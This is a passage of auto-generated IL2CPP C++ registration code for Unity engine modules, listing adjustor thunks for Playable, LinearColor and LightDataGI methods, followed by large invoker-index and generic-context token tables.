{ 0x060008FF, PlayableHandle_GetPlayState_m14547B804BB9B9B9E2B20B3F0975334CC99E778F_AdjustorThunk },
{ 0x06000900, PlayableHandle_Play_m1EF8E1105EB6A4A9B0D6638A57CDCBCEEDC6FB2D_AdjustorThunk },
{ 0x06000901, PlayableHandle_Pause_m75833A31BA17AC8900736C6F5AC778D033001B32_AdjustorThunk },
{ 0x06000902, PlayableHandle_SetSpeed_m39D426AE0DF93F876C2C1EDF9417C11B97A305E9_AdjustorThunk },
{ 0x06000903, PlayableHandle_GetTime_m27CB24B86EF0E6A4BD2C53907A677059B5D2BD5D_AdjustorThunk },
{ 0x06000904, PlayableHandle_SetTime_m6D255AB6779F3DC278813F1C016FE4EBC9F4B1E4_AdjustorThunk },
{ 0x06000905, PlayableHandle_IsDone_mF5DAB54F941BC13799577396526E3901CF639DE6_AdjustorThunk },
{ 0x06000906, PlayableHandle_GetDuration_mE3CF9C12CA5A186288A7F1981A92F043100E02A7_AdjustorThunk },
{ 0x06000907, PlayableHandle_SetDuration_m4E07F9F3A90B2F3CE10325D9F405993F03CCA08B_AdjustorThunk },
{ 0x06000908, PlayableHandle_SetPropagateSetTime_mD1458DFF49EF07D73884A9BBAC31358579C8931B_AdjustorThunk },
{ 0x06000909, PlayableHandle_GetGraph_m03AFC9F0B66AC13A120EC37F6964200C9973CE24_AdjustorThunk },
{ 0x0600090A, PlayableHandle_GetInputCount_m7FE60883E4B7C9AF7D39F28A044924ADBD5E5121_AdjustorThunk },
{ 0x0600090B, PlayableHandle_SetInputCount_m6067CD3616C428F777903FCBFD789060A2185DEE_AdjustorThunk },
{ 0x0600090C, PlayableHandle_SetInputWeight_mCC570E6D826D79987CC4E021DA9E7C0B700C0AC1_AdjustorThunk },
{ 0x0600090D, PlayableHandle_GetPreviousTime_m0C6881E900DF5FE7281699876DFE48BA64DEC1BF_AdjustorThunk },
{ 0x0600090E, PlayableHandle_SetTraversalMode_m5302D6FC1935F2EF97E25DF58B402CC8700DE03D_AdjustorThunk },
{ 0x0600090F, PlayableHandle_GetTimeWrapMode_m3C4CF421B7470E04537C45092DA9A1D242A5D1B4_AdjustorThunk },
{ 0x06000910, PlayableHandle_SetTimeWrapMode_m88B50CE0AABE0183BBF12ACEC5E84CBEDAB76C2F_AdjustorThunk },
{ 0x06000911, PlayableHandle_GetScriptInstance_m14D182ED7BEB2AAE1ADD86189A687FF0F86FA925_AdjustorThunk },
{ 0x06000912, PlayableHandle_GetInputHandle_mB9DAEF700C72515D7CA640F71C51A09C08DAD380_AdjustorThunk },
{ 0x06000913, PlayableHandle_SetInputWeightFromIndex_mF56AA0C0055C18FF46EF8E315331FDF45D832752_AdjustorThunk },
{ 0x06000914, PlayableHandle_GetInputWeightFromIndex_mF50333BE4F3BD48CCF6A431BC6B99D4CBF131CD6_AdjustorThunk },
{ 0x06000930, PlayableOutput__ctor_m55FBB20EC479F67641835EA48D84A1AB3DF39747_AdjustorThunk },
{ 0x06000931, PlayableOutput_GetHandle_m12FF2889D15884CBEB92A6CB376827EBA5A607BF_AdjustorThunk },
{ 0x06000933, PlayableOutput_Equals_m4CC730818751114DC5643600B5FE20243F4B7121_AdjustorThunk },
{ 0x0600093F, PlayableOutputHandle_GetHashCode_mC2FAF756D71026E3AF4492157EDAE7186429B079_AdjustorThunk },
{ 0x06000941, PlayableOutputHandle_Equals_mB9106CB9333E0BF4C893E43AD7A23B64471CC21A_AdjustorThunk },
{ 0x06000942, PlayableOutputHandle_Equals_mF5C23882B2A007186F00EB3D23E9BD6664E8DAE6_AdjustorThunk },
{ 0x06000944, PlayableOutputHandle_IsValid_mA94C343D72B72C3B1C7636C93A8DB5EA71691312_AdjustorThunk },
{ 0x06000945, PlayableOutputHandle_GetPlayableOutputType_m5FA19BC37FD64EC6C2174B6DA6CB202F5451C108_AdjustorThunk },
{ 0x06000946, PlayableOutputHandle_SetReferenceObject_m898B8810539BBD3B4B4382CD436FE84EC60AF77F_AdjustorThunk },
{ 0x06000947, PlayableOutputHandle_SetUserData_m23E8BB63D93E67DD981C9045D610C6B2289F435B_AdjustorThunk },
{ 0x06000948, PlayableOutputHandle_GetSourcePlayable_m6D142AAB19E92AAD5D7C4F96087F27B0F8185627_AdjustorThunk },
{ 0x06000949, PlayableOutputHandle_SetSourcePlayable_mBC96BBEB1838444B937337B985FFD9A6084A6A8D_AdjustorThunk },
{ 0x0600094A, PlayableOutputHandle_GetSourceOutputPort_m9E9AA2A0E62DFBA3570DC262AFECD08FF0E71D1F_AdjustorThunk },
{ 0x0600094B, PlayableOutputHandle_SetWeight_m6A8B44B22EFA5628A90A87085FD86D478913093F_AdjustorThunk },
{ 0x0600094C, PlayableOutputHandle_PushNotification_m97131909E6A9A76742074B4023CA6C94A2A95610_AdjustorThunk },
{ 0x0600094D, PlayableOutputHandle_AddNotificationReceiver_m2E93B0DB0A7A98AECFDAEB02D610B45617FC357C_AdjustorThunk },
{ 0x0600096B, ScriptPlayableOutput__ctor_m867BA54A9DCDFCA187EA927F75A6903D0F8FF2C4_AdjustorThunk },
{ 0x0600096D, ScriptPlayableOutput_GetHandle_m21A3E97125928298D6942D0EDE58ADAD018E4E93_AdjustorThunk },
{ 0x0600096F, LinearColor_get_red_m376617B8E3156420835055189BB28D953FE46A2A_AdjustorThunk },
{ 0x06000970, LinearColor_set_red_m0ACFCEDDD205A6F235BE95936816E92898B01B52_AdjustorThunk },
{ 0x06000971, LinearColor_get_green_mCCE90A662234EE3605368F3AEC14E51572665AE5_AdjustorThunk },
{ 0x06000972, LinearColor_set_green_mBD9C7EA6415DC54B3F6B643C3CD02B71565F0694_AdjustorThunk },
{ 0x06000973, LinearColor_get_blue_mAFAEA5D5590DD14CFC48BC18DF4BFEBBDCB0A99A_AdjustorThunk },
{ 0x06000974, LinearColor_set_blue_m3FEEAF946772BB177733B67D9DA4B72D84874375_AdjustorThunk },
{ 0x06000977, LightDataGI_Init_m112DEBB76EC57AC52E6384C97A3E8B2EAA867207_AdjustorThunk },
{ 0x06000978, LightDataGI_Init_mACE06E00CC639CA89F3847E9DB55FD0F00812A7A_AdjustorThunk },
{ 0x06000979, LightDataGI_Init_m0A999D118CDCBDA99B9E24231ED057D943C9C67B_AdjustorThunk },
{ 0x0600097A, LightDataGI_Init_mDC887CA8191C6CADE1DB585D7FEB46B080B25038_AdjustorThunk },
{ 0x0600097B, LightDataGI_Init_mB2D1C73EDFEA6815E39A0FE3ED2F7BF9A7117632_AdjustorThunk },
{ 0x0600097C, LightDataGI_InitNoBake_mBDF2EFB22D4BEE63B6F25F4EE9F1522D2866ED43_AdjustorThunk },
{ 0x06000992, CameraPlayable_GetHandle_mA04469CA50B43AF6219F9967B8AEB310CB5455BD_AdjustorThunk },
{ 0x06000993, CameraPlayable_Equals_mD0FA195F3EA6511043E8F0AA1680CEB7E0E2E2CF_AdjustorThunk },
{ 0x06000994, MaterialEffectPlayable_GetHandle_m748319E116317E9ADD1EA36A4EDA488338471058_AdjustorThunk },
{ 0x06000995, MaterialEffectPlayable_Equals_mC55640B5D29F90360F9743549FABD43C5AA320EC_AdjustorThunk },
{ 0x06000996, TextureMixerPlayable_GetHandle_mB75CF651C6BDDF347ED6938D0F1DE4BED92BB7CD_AdjustorThunk },
{ 0x06000997, TextureMixerPlayable_Equals_m6838329B39779020FC3309B7406B8A0418F44FE7_AdjustorThunk },
{ 0x06000998, TexturePlayableOutput_GetHandle_m482C2E6F3FB849142FA7936B1B6A0B9B072A1899_AdjustorThunk },
};
static const int32_t s_InvokerIndices[2489] =
{
4896,
4896,
3969,
7673,
3943,
3969,
4797,
4896,
3969,
4961,
3946,
4896,
5645,
7544,
7544,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4896,
4833,
7673,
7532,
7445,
6573,
6026,
6572,
6024,
6286,
5794,
3969,
5729,
7335,
6025,
5309,
5646,
7004,
5803,
718,
4896,
4896,
4896,
4896,
4896,
7673,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4896,
4896,
4896,
4896,
4896,
4896,
0,
0,
0,
0,
0,
0,
5925,
7006,
6288,
5797,
5174,
6340,
7007,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4896,
4896,
7299,
2236,
835,
4838,
4002,
4838,
4002,
4002,
4002,
7544,
7332,
3311,
4896,
3562,
4797,
3969,
2889,
4770,
3969,
2889,
4797,
5708,
5708,
3969,
4896,
3335,
3335,
4770,
1942,
7657,
7657,
7657,
7643,
7546,
7635,
7542,
7635,
7673,
5850,
7546,
7546,
7546,
7546,
7657,
7673,
7673,
7673,
7552,
7546,
7657,
2185,
4896,
2185,
1155,
7393,
3946,
4896,
4838,
4002,
4838,
4002,
4838,
4002,
4838,
4002,
4833,
3997,
4838,
4838,
4770,
4770,
4770,
3943,
4833,
3997,
4885,
4044,
4885,
4044,
4770,
3943,
4818,
4797,
4770,
4790,
3961,
4896,
1715,
1715,
3629,
3629,
3629,
1480,
1481,
2970,
7643,
7643,
4833,
7635,
7303,
7635,
7303,
2004,
2004,
2004,
2004,
7546,
7546,
7546,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
1048,
1048,
1779,
1048,
2185,
3969,
2256,
6397,
2185,
3902,
4887,
4046,
4046,
3997,
3943,
4797,
3969,
7043,
7546,
3848,
3848,
3848,
5826,
7048,
744,
2187,
4896,
7643,
5972,
7546,
7048,
7546,
7048,
7048,
6404,
7546,
7048,
7546,
7048,
7048,
6404,
7552,
7066,
7546,
7048,
6782,
7657,
7673,
0,
0,
2257,
4770,
3335,
3257,
4887,
4046,
4887,
4046,
4887,
4046,
4887,
4887,
6735,
6735,
2257,
4046,
3887,
4797,
1461,
4887,
2257,
1586,
4797,
1461,
2257,
4887,
4887,
3628,
4797,
1461,
835,
2252,
3987,
7653,
5716,
4838,
4002,
4838,
4002,
4885,
4044,
4885,
4044,
4885,
4044,
4885,
4044,
4838,
4002,
4838,
4002,
4885,
4044,
4838,
4002,
4838,
4002,
4838,
4002,
4838,
4002,
3422,
3424,
7437,
3354,
1590,
6795,
6795,
4770,
3335,
3354,
4797,
1461,
4770,
3943,
4770,
3943,
4770,
3943,
4770,
3943,
4770,
4770,
4770,
4770,
732,
3355,
4797,
1461,
3355,
4896,
2185,
4896,
4797,
1461,
4896,
7637,
7544,
4770,
3943,
4770,
3943,
4770,
3943,
4770,
3943,
4770,
4770,
2977,
1779,
4896,
7075,
7075,
7624,
7537,
7545,
7004,
7004,
7532,
7532,
7532,
4770,
3943,
3943,
7303,
7546,
7546,
7673,
7673,
7546,
7546,
4896,
3946,
4770,
4770,
4770,
4770,
7524,
7643,
7546,
7673,
6367,
6367,
5540,
7673,
2185,
4896,
7635,
7635,
7662,
7635,
7635,
7635,
7635,
7673,
5510,
7532,
5510,
5840,
5840,
7546,
7673,
5479,
6430,
7558,
6430,
7071,
5872,
7537,
7545,
7545,
7673,
7673,
7673,
7673,
7545,
5872,
5872,
7032,
7032,
7542,
7673,
5869,
5869,
7549,
7532,
7532,
5868,
7532,
7673,
7673,
4797,
7635,
7542,
7635,
4838,
4002,
3891,
3891,
3943,
2061,
3848,
3848,
1942,
2027,
2062,
1950,
2004,
1102,
7637,
7544,
3997,
4896,
1102,
4896,
4896,
4896,
2027,
2062,
2176,
2004,
2004,
1942,
1942,
4797,
4797,
3969,
4797,
3969,
3969,
3969,
3969,
4833,
3997,
3943,
3997,
4770,
3943,
4770,
3943,
4797,
4797,
4797,
3969,
7394,
7303,
7303,
4896,
7048,
7048,
7546,
3969,
3969,
3969,
4723,
3891,
4797,
2708,
3308,
3335,
3943,
3969,
3969,
3335,
4770,
901,
1463,
3308,
3969,
4797,
3969,
4797,
3969,
4770,
2027,
1950,
1997,
2004,
3559,
2470,
2922,
2193,
2027,
2176,
1950,
2062,
1997,
2004,
3560,
3559,
2471,
2470,
3630,
2925,
2922,
1942,
1942,
1942,
4770,
4838,
4723,
4838,
4002,
4838,
4838,
4782,
4770,
4838,
4797,
3848,
3848,
4896,
4797,
3969,
4797,
4896,
7546,
4896,
1452,
70,
68,
3943,
3308,
69,
67,
882,
734,
4833,
4770,
4770,
4720,
3887,
3997,
3943,
3943,
4896,
7299,
7299,
0,
0,
69,
67,
0,
0,
0,
0,
0,
0,
4797,
3969,
4797,
3969,
4797,
3969,
3969,
3969,
4797,
3969,
3969,
1137,
786,
0,
0,
0,
3969,
1137,
786,
0,
0,
0,
3969,
1137,
786,
3969,
1137,
786,
0,
2004,
2004,
743,
372,
743,
372,
0,
0,
0,
0,
2004,
4896,
1541,
3308,
3308,
3969,
2922,
1452,
1095,
71,
2182,
1142,
790,
185,
1137,
385,
112,
0,
0,
4896,
4896,
4896,
3943,
3943,
4896,
3848,
3848,
4896,
4770,
4770,
4770,
3943,
4770,
3943,
4833,
4770,
3943,
4770,
3943,
4885,
4770,
4770,
3308,
1537,
2925,
7673,
3848,
4770,
7643,
5098,
5109,
4833,
2228,
1537,
356,
426,
664,
2884,
4771,
3946,
2182,
935,
175,
358,
735,
1981,
5135,
1092,
1245,
0,
2228,
4896,
1537,
664,
1537,
664,
2182,
3969,
354,
371,
5157,
5184,
3946,
4833,
1537,
1537,
1095,
1095,
1095,
732,
733,
739,
1099,
5674,
7542,
4833,
5057,
5068,
3946,
357,
357,
172,
357,
173,
358,
175,
5134,
7542,
7635,
4833,
5097,
5108,
935,
935,
357,
357,
172,
174,
176,
358,
7542,
4833,
5156,
5183,
732,
732,
357,
358,
370,
735,
7542,
4770,
3943,
4770,
3943,
3943,
3943,
7643,
7546,
7643,
7546,
4821,
4821,
3943,
4821,
4821,
3997,
7546,
3991,
4823,
7397,
7546,
4896,
3991,
3969,
732,
732,
357,
357,
732,
357,
732,
1095,
357,
172,
6532,
4823,
7551,
6532,
7397,
5046,
5673,
3848,
3848,
3848,
3848,
7384,
4770,
3943,
4770,
3943,
4770,
3943,
4770,
3943,
3943,
4770,
3943,
4770,
3943,
4770,
3943,
3943,
3943,
3943,
3943,
732,
357,
2225,
3997,
3997,
6415,
7635,
6387,
0,
0,
0,
0,
0,
0,
0,
0,
3969,
4797,
3969,
4833,
3997,
4770,
3943,
3308,
7394,
2004,
1103,
2187,
2187,
1103,
744,
7546,
7546,
7673,
3942,
3969,
1137,
4896,
835,
1198,
4797,
2925,
1461,
4770,
3335,
3262,
6469,
6469,
6470,
6737,
6737,
5937,
5937,
2472,
7624,
7624,
7624,
7624,
7624,
7624,
7624,
7624,
7624,
7624,
7624,
4723,
4838,
7526,
7238,
827,
7239,
7235,
4797,
1461,
7637,
4896,
3311,
4896,
4896,
3335,
3335,
4770,
4887,
4887,
6030,
6778,
7343,
4790,
5663,
841,
1682,
3559,
4770,
3335,
3327,
6583,
6779,
3630,
3630,
3629,
3629,
3629,
7346,
7345,
7641,
4797,
2925,
1461,
7673,
7004,
5794,
6691,
7004,
5511,
6188,
6188,
6188,
6188,
5165,
3559,
2027,
1198,
2236,
4046,
6933,
4770,
3335,
3424,
6933,
7524,
4896,
4887,
6893,
6933,
6933,
6893,
6169,
6893,
7491,
4838,
7491,
4838,
6933,
6933,
7671,
7671,
7671,
7671,
7671,
7671,
7671,
7671,
6933,
6933,
7524,
6932,
6931,
6932,
6826,
6826,
4797,
2925,
1461,
7673,
5801,
6644,
7431,
6090,
6090,
7432,
7522,
6643,
6644,
835,
7652,
6642,
6929,
7460,
6789,
6789,
6889,
6889,
7524,
4887,
6092,
7432,
7431,
4812,
4770,
3335,
3349,
4797,
2925,
1461,
7673,
6286,
7004,
5801,
5801,
7004,
7004,
6429,
6286,
7451,
7299,
7488,
6891,
7488,
7488,
7488,
7488,
7488,
7488,
6891,
7488,
7488,
7299,
6891,
6532,
6891,
6532,
6891,
7488,
6891,
7488,
7488,
7488,
7488,
7488,
7306,
7306,
7306,
7488,
6167,
5976,
7488,
6167,
6167,
6167,
6799,
5161,
6891,
6167,
6891,
7673,
3559,
2027,
2236,
6182,
6182,
6922,
4896,
4885,
4797,
2925,
1461,
4770,
3335,
3422,
6892,
4838,
4838,
6892,
6892,
7490,
6922,
6922,
6922,
6922,
6922,
6922,
7518,
6921,
6916,
6921,
6824,
6824,
7520,
7523,
7670,
7670,
7670,
7670,
7670,
7670,
7673,
4770,
3943,
4770,
3943,
1981,
7519,
6825,
3335,
3423,
4770,
4797,
1461,
7673,
3559,
2027,
835,
6190,
4770,
3335,
3425,
7531,
4888,
6894,
7492,
4838,
4838,
7672,
7672,
6936,
6935,
6935,
6827,
6827,
7530,
7525,
7529,
4797,
1461,
7673,
0,
0,
0,
0,
0,
0,
0,
0,
1060,
924,
4896,
3937,
3937,
4896,
4833,
4896,
7657,
7673,
7546,
7546,
6402,
6130,
7673,
7673,
4896,
4896,
3969,
4896,
4002,
3969,
2236,
4896,
1981,
7429,
7038,
3969,
3981,
7456,
6788,
4770,
3335,
3348,
7429,
4797,
6891,
6532,
6532,
7662,
7394,
6610,
7643,
7643,
4896,
2925,
1461,
7673,
0,
0,
6610,
6610,
0,
7544,
4896,
4896,
4896,
7394,
7394,
7303,
7303,
7303,
0,
7673,
4896,
3969,
3969,
2182,
3969,
3969,
3943,
4896,
3969,
2192,
1168,
4896,
4896,
4896,
3969,
3943,
4770,
4896,
4833,
3997,
4833,
4896,
7673,
4797,
4797,
2925,
2185,
0,
0,
1463,
0,
0,
0,
0,
0,
1463,
0,
0,
0,
0,
2925,
2187,
2187,
0,
4797,
0,
3335,
4896,
4896,
4896,
7544,
7045,
6064,
0,
4797,
4833,
4896,
4896,
4896,
4896,
7391,
0,
2925,
2185,
1463,
0,
0,
1463,
0,
0,
143,
2925,
0,
0,
0,
0,
0,
0,
0,
0,
2185,
2925,
2925,
0,
4797,
4770,
3943,
3997,
4833,
4833,
3997,
4797,
3335,
7394,
1155,
1155,
3969,
3969,
4896,
2187,
7048,
7394,
7302,
7336,
4770,
7303,
7546,
5495,
5833,
7045,
4833,
4896,
2193,
1173,
3969,
3335,
2925,
1461,
2925,
2925,
3969,
3969,
3969,
4896,
4833,
3997,
7546,
7546,
7454,
5856,
7048,
6782,
7454,
1461,
2925,
3969,
3969,
4797,
4896,
0,
0,
7303,
0,
7043,
7394,
4770,
1981,
4896,
3943,
3943,
4896,
7394,
0,
7546,
6611,
7643,
7657,
4896,
7546,
7643,
6386,
7394,
7673,
4896,
3969,
2194,
4797,
4797,
4797,
7394,
7673,
4896,
6782,
3335,
4770,
7673,
7673,
4896,
2187,
4770,
4770,
3335,
7454,
6782,
7454,
4773,
4797,
3969,
6076,
7394,
6066,
0,
0,
0,
0,
7053,
7546,
7052,
7546,
7394,
6611,
7546,
4770,
3943,
0,
0,
7048,
6611,
4797,
6782,
6782,
7635,
7394,
6066,
6076,
7394,
7394,
7048,
7391,
4896,
7673,
6053,
3943,
2182,
2187,
2187,
4797,
4896,
4833,
7673,
7673,
7452,
1157,
4896,
4896,
4896,
4002,
4838,
4002,
4833,
4002,
4896,
4896,
4896,
0,
0,
2730,
4896,
4896,
7635,
7635,
7657,
7454,
7451,
7451,
7635,
7635,
7635,
7635,
7657,
7451,
7451,
7635,
7635,
6766,
6532,
7299,
7662,
7662,
7662,
7662,
7662,
7662,
7662,
7554,
7635,
7662,
7544,
4896,
4896,
77,
6014,
7657,
7657,
7657,
7657,
5049,
5325,
4797,
3969,
7552,
4833,
3997,
4770,
3943,
4833,
4833,
4813,
3983,
7004,
7020,
2255,
4797,
2925,
2963,
2962,
4887,
4887,
4887,
7650,
3335,
3347,
4770,
7673,
1155,
4896,
7546,
7546,
4818,
4885,
4044,
4885,
4044,
4885,
4044,
4885,
4044,
4885,
4044,
4887,
4046,
4885,
4044,
4885,
4044,
4896,
3969,
3969,
2027,
7546,
4885,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
2185,
3969,
4896,
4887,
4046,
4887,
4046,
4887,
4046,
4887,
4046,
4887,
4887,
4812,
3982,
4812,
3982,
4887,
4046,
4797,
3969,
4797,
3969,
4797,
3969,
2192,
4790,
4790,
2255,
2256,
1206,
1208,
2257,
2257,
3629,
3629,
3629,
3629,
4770,
4896,
6066,
2925,
4887,
3335,
4833,
3997,
4797,
2922,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
3848,
1779,
1784,
1779,
1779,
1779,
1779,
1779,
3848,
3969,
4797,
4833,
4896,
4896,
3969,
4723,
3891,
3848,
3848,
4896,
4770,
4770,
4770,
4818,
4888,
4888,
4888,
5051,
4720,
4818,
4888,
4797,
4838,
4797,
4885,
4833,
4770,
4770,
4818,
4797,
4797,
4797,
5051,
5090,
5144,
5338,
5697,
3848,
3848,
3848,
3848,
5047,
3848,
3848,
3848,
3848,
5748,
5748,
7527,
7527,
7527,
7517,
7454,
7546,
7546,
7546,
7546,
3335,
3728,
3943,
3943,
3943,
4896,
7643,
5983,
5984,
7052,
5112,
4896,
7643,
4833,
7643,
4896,
4797,
1806,
1806,
3969,
3969,
3969,
3969,
1806,
1524,
1523,
4896,
5835,
7542,
7542,
4896,
4896,
3335,
4896,
3335,
4896,
3969,
1060,
2920,
1806,
4896,
4896,
4896,
4763,
3937,
4896,
4896,
3335,
4896,
3335,
4896,
3335,
7048,
7552,
7066,
7066,
0,
0,
0,
6404,
0,
0,
0,
6404,
0,
0,
7048,
0,
0,
7048,
7020,
7673,
2187,
4797,
7394,
6610,
6066,
6611,
7401,
7394,
4797,
4797,
4770,
4838,
4797,
4833,
4896,
4896,
4896,
4896,
2187,
0,
0,
7454,
0,
3969,
3969,
2187,
3969,
3969,
4896,
1572,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4797,
4797,
4797,
4770,
4797,
4833,
2925,
6064,
4896,
4896,
4896,
4896,
2187,
3969,
3969,
2187,
4896,
4797,
4896,
4896,
4896,
4896,
0,
0,
2925,
634,
4896,
4896,
3969,
2187,
4797,
4797,
6064,
2185,
4896,
4896,
3969,
3969,
1461,
1461,
7394,
4896,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
3969,
4896,
4896,
823,
823,
3969,
7391,
7299,
4770,
4797,
4770,
4770,
3335,
7635,
7476,
5685,
7019,
5682,
7643,
7643,
4896,
4770,
3554,
631,
2929,
7673,
7635,
7635,
7659,
7476,
7476,
5685,
7401,
7546,
7546,
7546,
7546,
7542,
6877,
7068,
7553,
7069,
7673,
7532,
7019,
3943,
4797,
2185,
4896,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
3969,
4797,
3335,
4770,
4896,
7451,
4770,
3943,
4770,
3943,
4770,
3943,
4770,
3943,
732,
4797,
4770,
3335,
3428,
3943,
7439,
4797,
4770,
3357,
3335,
7657,
7643,
7643,
7635,
7532,
7673,
3997,
7637,
4896,
3969,
4896,
75,
729,
1189,
1537,
2161,
4896,
4896,
3997,
4896,
1166,
2161,
74,
728,
1682,
4770,
3335,
3372,
6800,
106,
6386,
2185,
1439,
3316,
3335,
4770,
0,
1193,
2232,
2232,
1193,
4833,
3997,
4896,
3997,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
4797,
0,
4896,
4896,
4896,
7643,
7546,
7673,
7546,
7673,
7643,
6399,
7546,
7673,
2187,
3946,
3969,
3366,
3335,
4770,
7673,
6339,
3969,
3335,
3369,
4770,
3997,
3997,
3997,
3943,
3943,
3943,
3943,
3943,
3943,
3943,
3943,
3374,
3335,
4770,
7643,
7546,
4770,
4770,
4770,
4770,
4833,
4833,
4833,
4833,
4833,
7544,
7451,
7021,
7451,
7021,
7021,
7021,
7544,
7544,
7544,
7544,
4896,
7673,
3308,
4838,
4838,
4770,
4833,
4833,
4833,
4806,
4770,
4833,
4741,
2023,
4833,
3292,
3335,
6754,
4770,
4797,
1461,
7272,
7673,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7646,
6634,
3977,
4805,
0,
4797,
3341,
7673,
0,
0,
0,
4741,
4797,
5857,
7045,
4896,
4896,
3974,
3974,
3974,
3974,
2216,
2216,
2216,
1179,
4797,
4797,
2960,
5712,
7673,
2185,
1476,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
2955,
0,
4896,
4833,
4833,
4002,
4797,
4770,
4770,
3976,
4805,
1565,
2959,
4833,
4753,
689,
7445,
7445,
7010,
7384,
7292,
7292,
7004,
7004,
6109,
6293,
7445,
7004,
5351,
0,
0,
7647,
2955,
1542,
3559,
6785,
3335,
3343,
4770,
6785,
3308,
1541,
4833,
4797,
3969,
4770,
4896,
4896,
3912,
4741,
3912,
4833,
4741,
3912,
3997,
4804,
4770,
3943,
2220,
4741,
3943,
4770,
3943,
4797,
2959,
2027,
3559,
7673,
7445,
7384,
7008,
7292,
7532,
7532,
7005,
7257,
7005,
7445,
7257,
7005,
7009,
7004,
7292,
7006,
6290,
7257,
7006,
7292,
7006,
7384,
6293,
6313,
6879,
7648,
3978,
4807,
0,
3344,
7673,
0,
0,
0,
0,
0,
0,
0,
0,
7649,
0,
4770,
6786,
3335,
3345,
6786,
4833,
4797,
3969,
3969,
4805,
2218,
4770,
4002,
1183,
3969,
7673,
7445,
7384,
7008,
7008,
7004,
6287,
7292,
7010,
5800,
7008,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
6086,
6639,
6878,
3978,
7660,
4807,
7428,
4838,
4002,
4838,
4002,
4838,
4002,
6579,
7640,
1779,
1779,
1779,
1779,
1779,
3943,
7451,
7341,
7485,
7236,
7015,
7038,
7038,
7038,
7038,
7038,
7038,
7546,
7643,
7673,
6397,
7673,
2185,
2170,
7673,
4896,
2170,
4805,
3258,
4805,
3324,
4805,
3407,
4807,
4833,
4896,
3997,
7657,
7643,
4896,
0,
7546,
7643,
7673,
7673,
4797,
3969,
3848,
4896,
6534,
6534,
6534,
6534,
6532,
7299,
7299,
7299,
6532,
7451,
7451,
6769,
7451,
7451,
7451,
7451,
7451,
7673,
};
static const Il2CppTokenRangePair s_rgctxIndices[138] =
{
{ 0x0200000F, { 1, 7 } },
{ 0x02000013, { 9, 7 } },
{ 0x0200002C, { 16, 16 } },
{ 0x0200002D, { 32, 2 } },
{ 0x02000030, { 38, 13 } },
{ 0x02000031, { 52, 4 } },
{ 0x02000062, { 62, 1 } },
{ 0x02000132, { 179, 6 } },
{ 0x02000133, { 185, 7 } },
{ 0x02000134, { 192, 9 } },
{ 0x02000135, { 201, 11 } },
{ 0x02000136, { 212, 3 } },
{ 0x0200013F, { 215, 8 } },
{ 0x02000141, { 223, 7 } },
{ 0x02000143, { 230, 9 } },
{ 0x02000145, { 239, 6 } },
{ 0x020001DA, { 245, 12 } },
{ 0x020001DB, { 257, 7 } },
{ 0x020001DC, { 264, 19 } },
{ 0x0200021E, { 356, 13 } },
{ 0x06000011, { 0, 1 } },
{ 0x06000017, { 8, 1 } },
{ 0x06000051, { 34, 2 } },
{ 0x06000052, { 36, 2 } },
{ 0x06000057, { 51, 1 } },
{ 0x0600007E, { 56, 2 } },
{ 0x0600007F, { 58, 1 } },
{ 0x06000081, { 59, 1 } },
{ 0x06000084, { 60, 1 } },
{ 0x06000085, { 61, 1 } },
{ 0x06000282, { 63, 2 } },
{ 0x06000283, { 65, 1 } },
{ 0x06000288, { 66, 1 } },
{ 0x06000289, { 67, 1 } },
{ 0x0600028A, { 68, 1 } },
{ 0x0600028B, { 69, 3 } },
{ 0x06000299, { 72, 1 } },
{ 0x0600029A, { 73, 1 } },
{ 0x0600029B, { 74, 2 } },
{ 0x0600029F, { 76, 1 } },
{ 0x060002A0, { 77, 1 } },
{ 0x060002A1, { 78, 2 } },
{ 0x060002A8, { 80, 1 } },
{ 0x060002AF, { 81, 1 } },
{ 0x060002B0, { 82, 1 } },
{ 0x060002B1, { 83, 2 } },
{ 0x060002B2, { 85, 1 } },
{ 0x060002C4, { 86, 1 } },
{ 0x060002C5, { 87, 2 } },
{ 0x060002F8, { 89, 2 } },
{ 0x060004F4, { 91, 2 } },
{ 0x060004F5, { 93, 2 } },
{ 0x060004F8, { 95, 2 } },
{ 0x06000502, { 97, 2 } },
{ 0x0600051F, { 99, 1 } },
{ 0x06000520, { 100, 1 } },
{ 0x06000522, { 101, 2 } },
{ 0x06000523, { 103, 1 } },
{ 0x06000524, { 104, 1 } },
{ 0x06000525, { 105, 1 } },
{ 0x06000526, { 106, 1 } },
{ 0x06000528, { 107, 2 } },
{ 0x06000529, { 109, 1 } },
{ 0x0600052A, { 110, 1 } },
{ 0x0600052B, { 111, 1 } },
{ 0x0600052F, { 112, 1 } },
{ 0x06000531, { 113, 1 } },
{ 0x06000541, { 114, 1 } },
{ 0x06000545, { 115, 1 } },
{ 0x06000546, { 116, 2 } },
{ 0x06000548, { 118, 1 } },
{ 0x06000549, { 119, 2 } },
{ 0x0600054C, { 121, 2 } },
{ 0x0600054D, { 123, 1 } },
{ 0x0600054E, { 124, 2 } },
{ 0x0600054F, { 126, 1 } },
{ 0x06000550, { 127, 1 } },
{ 0x06000551, { 128, 1 } },
{ 0x06000552, { 129, 2 } },
{ 0x06000553, { 131, 2 } },
{ 0x06000557, { 133, 2 } },
{ 0x0600058F, { 135, 3 } },
